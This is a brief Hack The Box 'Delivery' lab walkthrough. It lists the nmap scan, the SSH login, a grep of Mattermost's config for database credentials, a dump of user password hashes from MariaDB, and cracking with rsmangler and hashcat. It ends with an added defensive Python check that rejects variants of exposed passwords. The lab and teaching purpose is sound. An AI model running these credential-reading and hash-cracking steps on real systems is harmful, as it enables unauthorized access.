Delivery - Hack The Box
Reconnaissance
- Nmap
nmap -sS --open -p- --min-rate 5000 -vvv -n -Pn 10.10.10.222

Exploitation
- Abusing Support Ticket System




- Connect via SSH
ssh maildeliverer@10.10.10.222

Post-exploitation
- Check all listening ports
ss -nltp

- Leaked config data
cat /opt/mattermost/config/config.json | grep 3306

- Connect to MariaDB
mysql -u mmuser -p
select username,password from Users;

- Generate custom dictionary with PleaseSubscribe! variants

echo 'PleaseSubscribe!' > data.txt
rsmangler -f data.txt -o custom_dict.txt
hashcat -m 3200 hash.txt custom_dict.txt
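
The dictionary step above works because the password is a predictable mutation of a known string. The following is an added example, not part of the original notes: a check for password-set time that rejects candidates reducible to an exposed base string. The deny-list, the substitution table and the function names are assumptions made for the illustration.

```python
import re

# Constructed deny-list for this example: strings known to be exposed.
EXPOSED_BASES = ["PleaseSubscribe!"]

# Assumed substitution table: common "leet" characters mapped back to letters.
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a",
                      "5": "s", "7": "t", "@": "a", "$": "s"})


def forms(word):
    """Yield letter-only readings of a password.

    Two readings are needed because a digit can be either an affix
    (PleaseSubscribe!21) or a substitution (Pl3as3Subscrib3!).
    """
    lowered = word.lower()
    # Reading 1: treat leading/trailing non-letters as affixes and drop them.
    trimmed = re.sub(r"^[^a-z]+|[^a-z]+$", "", lowered)
    # Reading 2: treat every digit/symbol as a possible substitution.
    for text in (trimmed, lowered):
        yield re.sub(r"[^a-z]", "", text.translate(LEET))


def is_variant(candidate, base):
    """True if candidate contains base (forwards or reversed) after normalising."""
    # Ignore very short cores, which would match almost anything.
    base_cores = {f for f in forms(base) if len(f) >= 4}
    for form in forms(candidate):
        for core in base_cores:
            if core in form or core in form[::-1]:
                return True
    return False


def rejected_bases(candidate):
    """Return the exposed strings that the candidate is a variant of."""
    return [b for b in EXPOSED_BASES if is_variant(candidate, b)]


if __name__ == "__main__":
    # Constructed sample candidates.
    for pw in ["PleaseSubscribe!21", "Pl3as3Subscrib3!", "Tr0ub4dor&3"]:
        print(pw, "->", "reject" if rejected_bases(pw) else "accept")
```

A check like this belongs next to the hashing call in the password-change path, so that appended digits, case changes and character swaps on an exposed string are refused before a hash is ever stored.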

